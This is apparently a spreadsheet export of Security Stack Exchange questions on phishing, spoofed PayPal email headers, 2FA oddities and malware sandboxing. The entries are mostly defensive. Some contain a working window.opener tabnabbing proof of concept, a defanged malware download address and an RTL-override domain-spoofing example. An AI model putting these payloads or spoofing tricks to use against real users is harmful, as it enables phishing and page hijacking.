 &lt;p&gt;After a few of these messages I decided to investigate by going to Netflix and trying to log in with that email address. Using the "forgotten password" option I was able to get a password reset email, change the password and log in. The account appeared to be from Brazil, with some watch history but no other personal details stored and no payment information.&lt;/p&gt;
 &lt;p&gt;Soon the emails from Netflix started to ask me to update payment information. I didn't, of course, and then they changed to "your account will be suspended" and then "your account has been suspended". The "come back to Netflix" emails are still coming in occasionally.&lt;/p&gt;
 &lt;p&gt;I don't see how this could possibly be a phishing attempt - I carefully checked that I was on the real Netflix site, used a throwaway password not used on any other sites, and did not enter any of my personal information. I also checked the headers of the emails carefully and they were sent by Netflix. So is this just a mistake on somebody's part, mistyping an email address (although it's surprising that Netflix accepted it with no verification), or something more sinister?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;account-security&gt;</t>
  </si>
  <si>
    <t>Risks of HTML/JavaScript window.opener security flaw?</t>
  </si>
  <si>
    <t>&lt;p&gt;I do not know if you are aware of this flaw, but here is a basic example:&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;somepage.html&lt;/strong&gt; (pointing to &lt;strong&gt;malicious.html&lt;/strong&gt;):&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE html&amp;gt;
 &amp;lt;html&amp;gt;
 &amp;lt;head&amp;gt;
  &amp;lt;meta charset="utf-8"&amp;gt;
  &amp;lt;title&amp;gt;Test&amp;lt;/title&amp;gt;
 &amp;lt;/head&amp;gt;
 &amp;lt;body&amp;gt;
  &amp;lt;p id="test"&amp;gt;Some text&amp;lt;p&amp;gt;
  &amp;lt;p&amp;gt;&amp;lt;a href="malicious.html"&amp;gt;lien&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
 &amp;lt;/body&amp;gt;
 &amp;lt;/html&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;&lt;strong&gt;malicious.html:&lt;/strong&gt;&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE html&amp;gt;
 &amp;lt;html&amp;gt;
 &amp;lt;head&amp;gt;
  &amp;lt;meta charset="utf-8"&amp;gt;
  &amp;lt;title&amp;gt;Test&amp;lt;/title&amp;gt;
 &amp;lt;/head&amp;gt;
 &amp;lt;body&amp;gt;
  &amp;lt;script&amp;gt;
  var win = window.opener;
  win.document.getElementById("test").innerHTML = "&amp;lt;strong&amp;gt; This will be written on somepage.html&amp;lt;/strong&amp;gt;"; 
  &amp;lt;/script&amp;gt;
 &amp;lt;/body&amp;gt;
 &amp;lt;/html&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;If we click on the link on &lt;strong&gt;somepage.html&lt;/strong&gt;, this same page will be modified by &lt;strong&gt;malicious.html&lt;/strong&gt;. Apart from phishing, what are the risks of this flaw?&lt;/p&gt;
 &lt;p&gt;This flaw has been patched only on Chrome and Opera.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;javascript&gt;&lt;html&gt;</t>
  </si>
  <si>
    <t>Brute force copy of PKI root certificates</t>
  </si>
  <si>
    <t>&lt;p&gt;If an attacker wants to create a phishing website with a fake TLS certificate, to my noob mind, there is a way to do this:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Create the fake website certificate&lt;/li&gt;
 &lt;li&gt;Create the hash for this certificate&lt;/li&gt;
 &lt;li&gt;Take a valid root PKI certificate with the public key of the issuer&lt;/li&gt;
 &lt;li&gt;Create a fake digital signature, have this decrypt with the CA public key and checks if the outcome is the same as the hash of his fake certificate.&lt;/li&gt;
 &lt;li&gt;Repeat step 4 till a fake TLS certificate has been created.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Of course, this will take a near-infinite amount of time, but in this hypothetical case, sooner or later the attacker will have his fake certificate.&lt;/p&gt;
 &lt;p&gt;Is a brute force attack like this one possible, or am I missing something?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;tls&gt;&lt;public-key-infrastructure&gt;&lt;brute-force&gt;</t>
  </si>
  <si>
    <t>Prevent someone from using your site for phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;So I have a site where users can create online surveys and send them out to whomever they like. Over the past few months we have seen an uptick in one particular user who creates an account, then creates a survey where he requests user names and passwords for a different site. It's always the same site that he targets, and he always asks the same sorts of questions.&lt;/p&gt;
 &lt;p&gt;Our best solution up until now has been to create a monitoring service that searches for potentially malicious surveys and then notifies us when they are found. We then go in and manually review the survey and lock the account if it's up to something shady. &lt;/p&gt;
 &lt;p&gt;This has not been very effective. Even though the surveys are locked fairly quickly the malicious user still finds value in endlessly creating these surveys under new accounts and sending them out.&lt;/p&gt;
 &lt;p&gt;The best idea I've come up with is to not allow a survey to be activated by the user if it contains suspect keywords. Require and admin to review and activate it. The problem with this is that there are many false positives that get picked up, so I would need to perform an action more often than I do now in order to let the legit surveys go live.&lt;/p&gt;
 &lt;p&gt;Can anyone suggest an effective way to thwart this person without spending a chunk of my day performing manual tasks? Is there some way to fingerprint this user to prevent him from using our site for phishing?&lt;/p&gt;</t>
  </si>
  <si>
    <t>How is it possible that this spam mail came from Google Forms without revealing their sender address?</t>
  </si>
  <si>
    <t>&lt;p&gt;I got just this typical spam email, but this one seemed odd. It came from Google Forms, which apparently can send emails too, however you have to sign in to Google Forms to use it, and it uses the email you signed in with.&lt;/p&gt;
 &lt;p&gt;How did this spammer manage to appear to send from the Forms email? This seems like it can be easily used to phish unsuspecting people who trust a Google address. What is especially strange is that this mail came from the &lt;code&gt;google.com&lt;/code&gt; domain, which is not something that public users can create mails on, &lt;em&gt;and&lt;/em&gt; it is signed by google.com, so as far as i understand it cant be spoofed - so how is this possible?&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/46Yn3.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/46Yn3.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>How did this paypal spoof email pass SPF, DKIM and DMARC</t>
  </si>
  <si>
    <t>&lt;p&gt;This mail that got through has me stumped. It appeared to me as being from &lt;code&gt;PayPal &amp;lt;unclaimedproperty@paypal.com&amp;gt;&lt;/code&gt; in my Inbox. I happened to look at the original and it says SPF, DKIM and DMARC all passed.&lt;/p&gt;
 &lt;p&gt;If I'm reading this right, &lt;code&gt;74.112.67.243&lt;/code&gt; connected to &lt;code&gt;mail2550.paypal-notification.com&lt;/code&gt; and sent the mail. They used a &lt;code&gt;Return-Path: &amp;lt;blahblah@bounce.paypal.mkt2944.com&amp;gt;&lt;/code&gt;.&lt;/p&gt;
 &lt;p&gt;&lt;code&gt;bounce.paypal.mkt2944.com&lt;/code&gt; (currently) has a SPF record of &lt;code&gt;v=spf1 a ip4:208.85.50.137 ip4:74.112.67.243 -all&lt;/code&gt;. So OK, they setup a spam mailer and worked it so SPF passes (the mail server &lt;code&gt;paypal-notification.com&lt;/code&gt; is gone, seemingly owned by MarkMonitor now, so somebody else noticed this).&lt;/p&gt;
 &lt;p&gt;But then the DKIM signature has&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; s=spop1024; d=paypal.com; h=Date:From:Reply-To:To:Message-ID:Subject:MIME-Version:Content-Type: X-CSA-Complaints:List-Unsubscribe;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Is this not saying &amp;quot;I'm signing all these headers with the key who's public portion is in a TXT record at &lt;code&gt;spop1024._domainkey.paypal.com&lt;/code&gt;&amp;quot; (which exists)?&lt;/p&gt;
 &lt;p&gt;This passes, to my surprise&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Authentication-Results: mx.google.com;
  dkim=pass
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I've looked over and over to see if it's a close-cousin typo thing, or unicode address, etc. But it really seems to be signed by that &lt;code&gt;paypal.com&lt;/code&gt; key...?&lt;/p&gt;
 &lt;p&gt;After that, it's still unclear to me why DMARC then passes -- I thought the &lt;code&gt;From:&lt;/code&gt; address had to be &amp;quot;aligned&amp;quot; with the &lt;code&gt;Return-Path:&lt;/code&gt;?&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Delivered-To: &amp;lt;me@gmail.com&amp;gt;
 Received: by 2002:a4a:804a:0:0:0:0:0 with SMTP id y10csp7519296oof;
  Mon, 22 Nov 2021 12:45:16 -0800 (PST)
 X-Google-Smtp-Source: ABdhPJyxHoL8oksdcw38NnmHlTdPo1UfJoTCZ/wFDToSgMfRPG6WgHlKDtKbSjMXNh5t44nHazym
 X-Received: by 2002:a25:4543:: with SMTP id s64mr27510605yba.304.1637613916462;
  Mon, 22 Nov 2021 12:45:16 -0800 (PST)
 ARC-Seal: i=1; a=rsa-sha256; t=1637613916; cv=none;
  d=google.com; s=arc-20160816;
  b=OvsnJASmnJT63M3MSQlcKCnmxHpmorUbQJk3lIVXRyjM6CXvrRuJ2J1TDvDEOlt3lu
  EzKQHgL++dswppXvJFLxkPxHq8cwPy4JBpvYmk1y1kqcuAE+tB2UJjjm+g2Fv1akRO9N
  iie60J6CAhOYz+6w/1bnJ7K0AIVdy9OKVTt1KECqGLzrB7/HFtPZ5i/BFObcP9tC53Ok
  ULyOlVLCM+iLNvmS9xFfz1YAzR+TDj5/OKUxdT0N96Ut+sVScBF2heLQvceZPv5nw9j0
  VCQjSS/e38koGlh+14We/6o74OHuGkF+pwgaRwfiW3hZtOx0echGxgMUMKB+E+bpV0JB
  PvhQ==
 ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816;
  h=list-unsubscribe:mime-version:subject:message-id:to:reply-to:from
  :date:dkim-signature;
  bh=CXo6gpd99q61PdtNQYL0HweNp45DQK9gDadq1QHszOQ=;
  b=AndF29ToqFkXaC88xiijwW2WKaK/3o+FURvx6HVtLghatUDEyVEr4VymEzez9Ijtrf
  Jogh9LH/sqLdrLTBN3oVgNoQlGUrf131M5aK5wrf18hCk54LrIHW1v1BA8Gsl4cO7PZ2
  I+kgLQJY+85mIA1L/NZXKvViNlehHXTjwQCHtnfcdWCuIbrb7OTpDu3SW1kFQ+Wjy6Xt
  Jnm/LXZyT6bexBCXJsISEywM8EwuyD7uz0Rm7O+Pw+AU1pYVt2qArFk2hRHiXeTrB57I
  Yp6n2JM79y420UIVv9o/oPJloQcFdnp45sDxv85tr6DhZpvHlH3v3o3doiy2kC6vaBQU
  aXkQ==
 ARC-Authentication-Results: i=1; mx.google.com;
  dkim=pass header.i=@paypal.com header.s=spop1024 header.b=NSAupQiY;
  spf=pass (google.com: domain of v-edjoiac_ibeieokafk_iekbmfgb_iekbmfgb_a@bounce.paypal.mkt2944.com designates 74.112.67.243 as permitted sender) smtp.mailfrom=v-edjoiac_ibeieokafk_iekbmfgb_iekbmfgb_a@bounce.paypal.mkt2944.com;
  dmarc=pass (p=REJECT sp=REJECT dis=NONE) header.from=paypal.com
 Return-Path: &amp;lt;v-edjoiac_ibeieokafk_iekbmfgb_iekbmfgb_a@bounce.paypal.mkt2944.com&amp;gt;
 Received: from mail2550.paypal-notification.com ([74.112.67.243])
  by mx.google.com with ESMTPS id n184si7359975ybn.210.2021.11.22.12.45.16
  for &amp;lt;me@gmail.com&amp;gt;
  (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256);
  Mon, 22 Nov 2021 12:45:16 -0800 (PST)
 Received-SPF: pass (google.com: domain of v-edjoiac_ibeieokafk_iekbmfgb_iekbmfgb_a@bounce.paypal.mkt2944.com designates 74.112.67.243 as permitted sender) client-ip=74.112.67.243;
 Authentication-Results: mx.google.com;
  dkim=pass header.i=@paypal.com header.s=spop1024 header.b=NSAupQiY;
  spf=pass (google.com: domain of v-edjoiac_ibeieokafk_iekbmfgb_iekbmfgb_a@bounce.paypal.mkt2944.com designates 74.112.67.243 as permitted sender) smtp.mailfrom=v-edjoiac_ibeieokafk_iekbmfgb_iekbmfgb_a@bounce.paypal.mkt2944.com;
  dmarc=pass (p=REJECT sp=REJECT dis=NONE) header.from=paypal.com
 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; s=spop1024; d=paypal.com; h=Date:From:Reply-To:To:Message-ID:Subject:MIME-Version:Content-Type: X-CSA-Complaints:List-Unsubscribe; i=unclaimedproperty@paypal.com; bh=CXo6gpd99q61PdtNQYL0HweNp45DQK9gDadq1QHszOQ=; b=NSAupQiYb884cGVqugiXkhz/FlcoddCqXJLcD+gwE2xFNP+27ZRQFCGOL61uEai1EdgqXLS0FKSV
  1ttmHVRu1H/So/7kxAm93NuGJGDe0K5/t9LK3QQF1bTQv7OHjBOi3FhmFvhSs1roN2q4r+8FxhmR
  HBqxI9Sbw63gjSDL7C8=
 Received: by mail2550.paypal-notification.com id hjg0lo2r7aoj for &amp;lt;me@gmail.com&amp;gt;; Mon, 22 Nov 2021 20:37:22 +0000 (envelope-from &amp;lt;v-edjoiac_ibeieokafk_iekbmfgb_iekbmfgb_a@bounce.paypal.mkt2944.com&amp;gt;)
 Date: Mon, 22 Nov 2021 20:37:22 +0000 (GMT)
 From: PayPal &amp;lt;unclaimedproperty@paypal.com&amp;gt;
 Reply-To: unclaimedproperty@paypal.com
 To: me@gmail.com
 Message-ID: &amp;lt;432115452.269147071637613442797.JavaMail.app@rbg41.atlis1&amp;gt;
 Subject: Notice of Unclaimed PayPal Funds
 MIME-Version: 1.0
 Content-Type: multipart/alternative; boundary=&amp;quot;----=_Part_1300052_1672151020.1637613438245&amp;quot;
 x-mid: 70903810
 X-CSA-Complaints: csa-complaints@eco.de
 x-rpcampaign: sp70903810
 x-job: 70903810
 x-orgId: 35487
 List-Unsubscribe: &amp;lt;http://links.paypal.mkt2944.com/luoo/v1/...&amp;gt;, &amp;lt;mailto:v-edjoiac_ibeieokafk_iekbmfgb_iekbmfgb_a@bounce.paypal.mkt2944.com?subject=Unsubscribe&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Am I missing something obvious?!&lt;/p&gt;
 &lt;p&gt;&lt;em&gt;update&lt;/em&gt;&lt;/p&gt;
 &lt;p&gt;It really does seem to pass DKIM.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;$ opendkim-testmsg &amp;lt; Notice\ of\ Unclaimed\ PayPal\ Funds.eml
 $ echo $?
 0
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;&lt;em&gt;update 2&lt;/em&gt;&lt;/p&gt;
 &lt;p&gt;Almost definitely a compromise of/via &lt;a href="https://www.acoustic.com/" rel="noreferrer"&gt;Acoustic&lt;/a&gt;, which was apparently once called &amp;quot;silverpop&amp;quot;&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;We're 10-year Acoustic Campaign veterans - original beta testers and
 daily users of the marketing automation tool for the last decade,
 since it was called Silverpop and then IBM Watson Campaign Automation.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;The DKIM key -- &lt;code&gt;spop1024._domainkey.paypal.com&lt;/code&gt;, from googling, refers to &amp;quot;silverpop 1024&amp;quot; (here's Wikimedia getting rid of it &lt;a href="https://phabricator.wikimedia.org/T214525" rel="noreferrer"&gt;https://phabricator.wikimedia.org/T214525&lt;/a&gt;). This is a legitimate key, but old. The classic &amp;quot;it's an older code, Sir, but it checks out&amp;quot; attack with a forgotten host, maybe?&lt;/p&gt;
 &lt;p&gt;&lt;code&gt;74.112.67.243&lt;/code&gt; is owned by &amp;quot;acoustic.co&amp;quot;. It sent the message and signed it. Not sure where the &lt;code&gt;mail2550.paypal-notification.com&lt;/code&gt; bit comes from, it's now owned by MarkMonitor.&lt;/p&gt;
 &lt;p&gt;Also, the &lt;code&gt;List-Unsubscribe: &amp;lt;http://links.paypal.mkt2944.com/luoo/v1/...&amp;gt;&lt;/code&gt; link seems legitimate. &lt;a href="http://links.paypal.mkt2944.com" rel="noreferrer"&gt;http://links.paypal.mkt2944.com&lt;/a&gt; still has some landing page branded with silverpop. This suggests to me the service actually &amp;quot;constructed&amp;quot; this mail, rather than say an plain open-relay situation.&lt;/p&gt;
 &lt;p&gt;As noted below, this does not include any obvious phishing login links. The idea must be that you log into your account legitimately, and can't find your &amp;quot;unclaimed funds&amp;quot; and call the phone number at the bottom of the email with your &amp;quot;client id&amp;quot;.&lt;/p&gt;
 &lt;p&gt;This PayPal account is actually closed, but was registered in California when I lived there (this fact, and that it made it into my inbox, was what got me looking at it closely). &amp;quot;Send this message to old accounts in California&amp;quot; seems like the type of thing this Acoustic marketing mail stuff does, so maybe that is related.&lt;/p&gt;
 &lt;p&gt;Dastardly ... I wonder how many hits they got from this ...&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;spam&gt;&lt;email-spoofing&gt;&lt;dkim&gt;&lt;dmarc&gt;</t>
  </si>
  <si>
    <t>Spoofed digitally signed email</t>
  </si>
  <si>
    <t>&lt;p&gt;So I received an email from "paypal.com" yesterday (and looks like most people did too&lt;a href="https://np.reddit.com/r/Bitcoin/comments/84vujs/warning_fake_emails_to_paypal_users_with_a/" rel="nofollow noreferrer"&gt;(1)&lt;/a&gt;) and I've verified the ascii letters are indeed what they appear as (No capital I instead of L in paypal.com etc).&lt;/p&gt;
 &lt;p&gt;The email looks like a very good attempt of being authentic and passes the tests that they teach most people on "how to detect a hoax email":&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Addresses me in my full name&lt;/li&gt;
 &lt;li&gt;Good english&lt;/li&gt;
 &lt;li&gt;No fake links&lt;/li&gt;
 &lt;li&gt;No real links, i.e. asking me to go to paypal instead&lt;/li&gt;
 &lt;li&gt;No dangerous call to action&lt;/li&gt;
 &lt;li&gt;From address is from a domain paypal controls&lt;/li&gt;
 &lt;li&gt;Signed from a domain paypal controls&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;There are a few suspicious giveaways like the mailed-by address and if you dig in the header, the Return-Path and Receive sections are strange.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;&lt;em&gt;Question is how is it possible that they can send a digitally signed email from a domain paypal controls.&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;.&lt;a href="https://i.stack.imgur.com/GSopL.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/GSopL.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;tls&gt;&lt;email&gt;&lt;phishing&gt;&lt;spam&gt;</t>
  </si>
  <si>
    <t>Why are there no software or services that detect Phishing Emails?</t>
  </si>
  <si>
    <t>&lt;p&gt;I tried Googling, but did not get a definitive answer. I'm looking for software or services that detect Phishing Emails. I read that some software like Norton, Kaspersky, etc. detect phishing websites, but do they detect Phishing Emails? How do you find software or services that detect Phishing Emails? Basically I want a software which can take emails as an input and tell whether an email is phishing or not. If I develop a system (algorithm) to detect phishing emails and test it with a large dataset of emails, I want to compare it with the performance of existing system.&lt;/p&gt;</t>
  </si>
  <si>
    <t>New Hires get phishing emails very quickly - Reasoning and how to stop</t>
  </si>
  <si>
    <t>&lt;p&gt;We hired a new Sales Ops member 1 week ago. Within a week he's getting emails similar to the below:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/QKaJL.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/QKaJL.png" alt="Email" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;I did some research on the sender and it is a valid email, valid person, SPF/DKIM checks come through fine. I reached out to my CEO to check to see if he knew the sender.&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;I know I can stop this by rejecting messages spoofing an employee, the problem is I'd be rejecting their personal emails due to the name part. Is there a way in Office 365 to detect these and stop them more intelligently?&lt;/li&gt;
 &lt;li&gt;What are the ways some of these scammers get this data so easily so that they can send emails like this? They're always hitting my sales teams and not my operations or tech team. My team is running BitDefender with the latest updates, and running behind some strong firewalls and gateways that also scan incoming and outgoing data.&lt;/li&gt;
 &lt;/ol&gt;</t>
  </si>
  <si>
    <t>how to identify whether my page is phished or normal page?</t>
  </si>
  <si>
    <t>&lt;p&gt;Usually I differentiate &lt;em&gt;phished&lt;/em&gt; page and &lt;em&gt;normal&lt;/em&gt; web pages by seeing &lt;code&gt;https&lt;/code&gt; before the address of the web page, as the lock symbol will help us to identify.&lt;/p&gt;
 &lt;p&gt;Are there any other methods to differentiate phished login pages and normal web page?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;web-browser&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How can this be possible? (malware autoinstall on chrome)</t>
  </si>
  <si>
    <t>&lt;p&gt;I have a website, using an ads service (qadabra). Yesterday some users reported me that the ads service sometimes redirects to a site containing malware.&lt;/p&gt;
 &lt;p&gt;the url is this:&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;PLEASE DON'T OPEN IT, IT MAY DAMAGE YOUR PC!!!&lt;/strong&gt;&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;http :// download.abocde.com /Flashplay /APX/ IT/ auload.php?installer= Flash_Player_11_for_Other_Browsers &amp;amp;browser_type= KHTML&amp;amp;dualoffer=false
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;(I've already reported it to google)&lt;/p&gt;
 &lt;p&gt;This website opens an alert that notifies that my video flash player is outdated. If I presso OK it downloads me an executable file automatically (without asking for confirm) and starts the application (again without confirm), installing some sort of adware.&lt;/p&gt;
 &lt;p&gt;I have chrome 33.0.1750.146 on windows, but it seems to work on all browsers.&lt;/p&gt;
 &lt;p&gt;How can this be possible? Is it using some kind of bug?&lt;/p&gt;
 &lt;p&gt;After some research I found that the download link of the malware app is this:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;filesystem:http:// download.abocde.com/temporary/flashplayer.exe
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;&lt;strong&gt;PLEASE DON'T OPEN IT, IT MAY DAMAGE YOUR PC!!!&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;What exactly is &lt;code&gt;filesystem:&lt;/code&gt;?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;chrome&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Why are the domains https.lk , ftp.lk and http.lk restricted on the Sri Lanka domain registry</t>
  </si>
  <si>
    <t>&lt;p&gt;I found &lt;a href="http://nic.lk" rel="nofollow"&gt;http://nic.lk&lt;/a&gt; which is the domain registry for .lk domains (I am in Sri Lanka).I typed in &lt;strong&gt;https.lk&lt;/strong&gt; and it said&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;'https.lk' Domain name you searched is restricted.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Why is this done. Is it to prevent phishing from someone doing something like &lt;strong&gt;https.lk/facebook.com&lt;/strong&gt;. But there seems to be a domain called &lt;strong&gt;https.com&lt;/strong&gt; which is already taken.&lt;/p&gt;
 &lt;p&gt;Why doesn't Sri Lanka allow the domain &lt;strong&gt;https.lk&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Also the same for &lt;strong&gt;http.lk&lt;/strong&gt; and &lt;strong&gt;ftp.lk&lt;/strong&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;domain&gt;</t>
  </si>
  <si>
    <t>Random PayPal 2FA Codes</t>
  </si>
  <si>
    <t>&lt;p&gt;I sent an email out to PayPal a few weeks ago, and no response to my question, so I've decided to bring it to the Community for help (as the issue has occurred just 30 minutes ago)&lt;/p&gt;
 &lt;p&gt;So, I'd say maybe a month or two ago (three max) I received probably 5 or 6 text messages regarding my PayPal 2FA code. It's from the same number that typically sends them, so I don't believe it it's a spoofed number, nor does it ask for any additional information. Just:&lt;/p&gt;
 &lt;p&gt;"PayPal: Your security code is: XXXXXX. Your code expires in 5 minutes. Please don't reply."&lt;/p&gt;
 &lt;p&gt;So, I don't think it's a spoofed number attempting to phish me. Anyways, I changed my password immediately and was good for a week or two. Then, I received more codes. Once again, 5 or 6. I changed my password yet again. Then a few weeks go by, more codes. I just changed my password yesterday or the day before as I had received more codes, and today I got more codes. &lt;/p&gt;
 &lt;p&gt;My question I guess is: How is this possible? How can I manage to receive 2FA codes days and weeks after changing my password. And please note: My passwords are randomly generated via Avast Passwords (A very reputable security company). They are 18 characters longed using a mixed character set of aZ 09 and symbols. They are beyond safe in terms of brute forcing. &lt;/p&gt;
 &lt;p&gt;I fail to see how my password can possibly be cracked? Another possibility I thought of was a key logger, or a potential virus. My password is generated within Avast Passwords, and stored on their servers, not on some file. And PayPal is the only issue I have this with, so if it was a virus, it should be happening on whatever sites I log into theoretically. &lt;/p&gt;
 &lt;p&gt;Is there a way to send 2FA codes to an account you're trying to log in to? Like, as a way to verify in case you forgot your password? Or is my PayPal password being cracked that fast? And if so, what security precautions do you recommend I take? Already ran multiple anti virus checks, and nothing has been found.&lt;/p&gt;
 &lt;p&gt;I'm dumbfounded on this issue.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;paypal&gt;</t>
  </si>
  <si>
    <t>Stopping a phishing email by blocking the ip address of the sender</t>
  </si>
  <si>
    <t>&lt;p&gt;I would like to know whether there is anyway of extracting and verifying the ip address of someone who has sent you an email. &lt;/p&gt;
 &lt;p&gt;Is this typically stored in an email's header / metadata? &lt;/p&gt;
 &lt;p&gt;If so, can this ip address adequately identify the ip address of the original sender? If the original sender was using a VPN, would the ip address in the email header and/or metadata accurately represent the sender?&lt;/p&gt;
 &lt;p&gt;The main reason I am asking is that I am receiving quite of lot of spam emails that are coming from different email addresses but containing the same phishing email. I am confident these are coming from the same source. If I block the ip address recorded in the email's header/meta data, would this be effective? Or would I be blocking some (innocent) VPN server somewhere overseas instead of the actual culprit? &lt;/p&gt;</t>
  </si>
  <si>
    <t>What is the best way to respond to phishing emails sent from a government domain?</t>
  </si>
  <si>
    <t>&lt;p&gt;In the past day or so, I've received two emails from different .gov addresses that purport to be from Intuit and encourage me to click on a link to "restore access to your QuickBooks account." They aren't pretending to be government addresses. If I click reply, the mail-to field says John.Doe@xxx.gov, just as the email states in the From section.&lt;/p&gt;
 &lt;p&gt;I have forwarded these emails to the FTC's recommended address for phishing scams, but I'd like to let the agencies involved know that they have compromised accounts. Is there an easy way to do that? I looked on the website of one agency, but there wasn't any contact that seemed right (Texas agriculture.gov). &lt;/p&gt;
 &lt;p&gt;Would emailing that person (at the compromised address) directly be useful? I don't want to spend all day on this, since I'm working. I just want to give someone a heads up. I was hoping there was a "report misused government email" contact box somewhere, but I can't find anything like that.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;government&gt;</t>
  </si>
  <si>
    <t>Which unicode (control) characters should a web app (not) accept?</t>
  </si>
  <si>
    <t>&lt;p&gt;THIS IS NOT ABOUT XSS&lt;/p&gt;
 &lt;p&gt;Threat: Mallory enters control characters in a public web application text field that other users might use in a terminal program (via copy+paste or by running a script). &lt;/p&gt;
 &lt;p&gt;Another threat is a user enters a phishing domain (that is later displayed) and uses a RTL control character so that it looks non-phishy. &lt;/p&gt;
 &lt;p&gt;&lt;code&gt;http://www.‚ÄÆmoc.lapyap&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;is actually &lt;code&gt;http://www.\u202Emoc.lapyap&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;(Another minor reason is that Postgres barfs if a user enters the null character). &lt;/p&gt;
 &lt;p&gt;I am not talking about a regular XSS injection that runs javascript. I am using JSoup to prevent XSS and it works fine, but doesn't block control chars (unless they happen to make an XSS)&lt;/p&gt;
 &lt;p&gt;I looked at OWASP ESAPI Validator but it only validates ASCII chars (ex in the getValidPrintable() method). &lt;/p&gt;
 &lt;p&gt;It seems like there's no good reason to accept:&lt;/p&gt;
 &lt;p&gt;\u0000 - \u001F (except carriage return, line feed, horizontal tab)&lt;br&gt;
 \u007F - \u009F&lt;br&gt;
 \u202E&lt;/p&gt;
 &lt;p&gt;Which others should I be concerned with?&lt;/p&gt;
 &lt;p&gt;Escaping / encoding on save is as incorrect as it is with XSS. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;</t>
  </si>
  <si>
    <t>Safe way to open potentially compromised attachments</t>
  </si>
  <si>
    <t>&lt;p&gt;I have in my inbox what I believe to be (95% sure) a phishing attack email or my IT department doing a phishing attack knowledge awareness campaign.&lt;/p&gt;
 &lt;p&gt;I'm a very curious person by nature and I'd like to poke around and see what is under the hood. What would be the safest way to open the document to see its actions and eventually de-compile it (I'm thinking of using JetBrains dotPeek). &lt;/p&gt;
 &lt;p&gt;Currently my plan is to spin up a VM install Sandboxie (probably overkill) and open up the attachment. &lt;/p&gt;
 &lt;p&gt;My question is what settings/steps should I take into consideration on my VM before opening up the attachment. Are there default ports open that would expose areas of attack to this attachment or [Insert knowledge you know that I don't even know to ask]. Secondly can I simulate that the VM is connected to the internet/network without being connected. In the case that the app waits for a connection before pinging/triggering.&lt;/p&gt;
 &lt;p&gt;Also what application would you use to track outbound requests made by the attachment or internal alterations to the OS/Environment/... &lt;/p&gt;
 &lt;p&gt;I'm leaving out the attachment type because I'd like to make a glass cage (I can see it but it can't interact with me) as general purpose tool. &lt;/p&gt;
 &lt;p&gt;Lastly I'm 90% sure but I'm still going to check. Downloading an attachment and not opening it is safe. There are no known vulnerabilities exposed in just downloading a file as long as it is not opened or executed (Is there a background process that could scan the file and could trigger it somehow)? If this is not safe, how would you transfer the file from an Outlook email to the VM? &lt;/p&gt;</t>
  </si>
  <si>
